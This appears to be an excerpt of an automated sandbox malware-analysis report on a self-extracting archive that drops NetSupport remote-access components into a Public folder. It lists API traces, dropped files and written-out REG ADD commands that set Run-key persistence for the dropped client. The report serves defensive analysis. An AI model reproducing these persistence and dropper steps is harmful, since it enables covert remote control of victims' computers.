                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe
                                Source: unknownProcess created: C:\Users\Public\Netstat\shv.exe "C:\Users\Public\Netstat\shv.exe"
                                Source: unknownProcess created: C:\Users\Public\Netstat\shv.exe "C:\Users\Public\Netstat\shv.exe"
                                Source: unknownProcess created: C:\Users\Public\Netstat\shv.exe "C:\Users\Public\Netstat\shv.exe"
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exeJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: dxgidebug.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: dbgcore.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: riched32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: file.exeStatic PE information: Image base 0x140000000 > 0x60000000
                                Source: file.exeStatic file information: File size 2283788 > 1048576
                                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\Public\Netstat\msvcr100.dllJump to behavior
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: msvcr100.i386.pdb source: shv.exe, shv.exe, 00000006.00000002.3996339764.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 00000009.00000002.2165257502.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 0000000B.00000002.2264988650.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 0000000D.00000002.2351625613.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 0000000E.00000002.2432218131.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: shv.exe, 00000006.00000002.3996589650.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 00000009.00000002.2166045519.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000B.00000002.2265311157.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000D.00000002.2352005765.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000E.00000002.2432458267.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: shv.exe, 00000006.00000000.2155681384.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000006.00000002.3993652493.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000009.00000000.2159146896.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000009.00000002.2162511343.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000B.00000000.2256622126.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000B.00000002.2263586732.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000D.00000000.2347023437.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000D.00000002.2349971528.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000E.00000002.2430920852.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000E.00000000.2429867736.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: file.exe
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: shv.exe, 00000006.00000002.3996495464.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 00000009.00000002.2165773946.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 0000000B.00000002.2265179419.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 0000000D.00000002.2351793987.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 0000000E.00000002.2432366354.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,6_2_11029590
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\__tmp_rar_sfx_access_check_6430546Jump to behavior
                                Source: file.exeStatic PE information: section name: .didat
                                Source: file.exeStatic PE information: section name: _RDATA
                                Source: PCICL32.DLL.0.drStatic PE information: section name: .hhshare
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7C5156 push rsi; retf 0_2_00007FF70E7C5157
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7C5166 push rsi; retf 0_2_00007FF70E7C5167
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_1116F055 push ecx; ret 6_2_1116F068
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_11169F49 push ecx; ret 6_2_11169F5C
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_1116F055 push ecx; ret 9_2_1116F068
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_11169F49 push ecx; ret 9_2_11169F5C
                                Source: msvcr100.dll.0.drStatic PE information: section name: .text entropy: 6.909044922675825

                                Persistence and Installation Behavior

                                barindex
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\msvcr100.dllJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\pcicapi.dllJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\shv.exeJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\PCICHEK.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\PCICL32.DLLJump to dropped file
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_6D1D7030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,6_2_6D1D7030
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,6_2_11127E10
                                Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetstatJump to behavior
                                Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetstatJump to behavior
                                Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetstatJump to behavior
                                Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetstatJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,6_2_11139090
